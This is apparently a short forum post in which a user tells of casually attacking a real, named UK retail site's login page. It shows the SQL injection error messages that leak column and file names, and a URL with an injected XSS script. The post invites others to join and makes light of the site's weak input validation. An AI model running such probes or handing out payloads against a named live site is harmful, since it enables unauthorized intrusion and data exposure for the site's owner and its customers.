Anyone fancy some? (basic/just for fun)
Was searching eBay for stuff and remembered I got a discount, went to the discount pages and got redirected, entered a simple SQL injection and got
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/_ourLounge/processlogin.asp, line 7
The full URL was
http://www.ourlounge.co.uk/_ourLounge/login.asp?Error=Invalid%20username%20or%20password%20entered.
http://www.ourlounge.co.uk/_ourLounge/login.asp?Error=<script>alert(1);</script>
… Just a start, I know.
Edit: And I think I'll stop there… their site is obviously hurting for some input validation.
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'v.StoreID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/_ourLounge/processlogin.asp, line 7
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'v.EMAIL_KEY' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/_ourLounge/processlogin.asp, line 7
Strikes a rather familiar chord with one of the challenges, doesn't it =P What a bunch of wangs. I'll leave it at that, seeing as I have no real interest in the site.